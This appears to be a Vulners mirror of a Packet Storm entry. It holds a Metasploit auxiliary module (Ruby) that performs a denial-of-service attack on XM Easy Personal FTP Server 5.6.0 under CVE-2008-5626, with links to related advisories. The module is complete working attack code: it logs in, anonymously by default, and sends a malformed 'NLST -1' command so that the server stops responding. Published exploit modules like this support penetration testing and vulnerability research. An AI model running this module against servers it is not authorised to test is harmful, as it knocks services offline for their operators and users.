Lucene search
K

XM Easy Personal FTP Server 5.6.0 NLST Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by Kris Katterjohn, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 185 Views

XM Easy Personal FTP Server 5.6.0 NLST DoS exploit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-5626
13 Oct 200800:00
circl
CVE
CVE-2008-5626
17 Dec 200817:00
cve
Cvelist
CVE-2008-5626
17 Dec 200817:00
cvelist
Metasploit
XM Easy Personal FTP Server 5.6.0 NLST DoS
9 Jan 200905:33
metasploit
Metasploit
XM Easy Personal FTP Server 5.7.0 NLST DoS
7 Apr 200918:26
metasploit
NVD
CVE-2008-5626
17 Dec 200817:30
nvd
OpenVAS
XM Easy Personal FTP Server Denial of Service Vulnerability
23 Dec 200800:00
openvas
OpenVAS
XM Easy Personal FTP Server 'NSLT' Command Remote DoS Vulnerability
21 Oct 200800:00
openvas
OpenVAS
XM Easy Personal FTP Server Denial of Service Vulnerability
23 Dec 200800:00
openvas
OpenVAS
XM Easy Personal FTP Server 'NSLT' Command Remote DoS Vulnerability
21 Oct 200800:00
openvas
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Ftp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS',  
'Description' => %q{  
This module is a port of shinnai's script. You need  
a valid login, but even anonymous can do it as long  
as it has permission to call NLST.  
},  
'Author' => 'kris katterjohn',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2008-5626'],  
[ 'OSVDB', '50837'],  
[ 'EDB', '6741' ]  
],  
'DisclosureDate' => '2008-10-13'))  
  
# They're required  
register_options([  
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),  
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])  
])  
end  
  
def run  
return unless connect_login  
  
raw_send("NLST -1\r\n")  
  
disconnect  
  
print_status("OK, server may still be technically listening, but it won't respond")  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 24
EPSS0.83067
185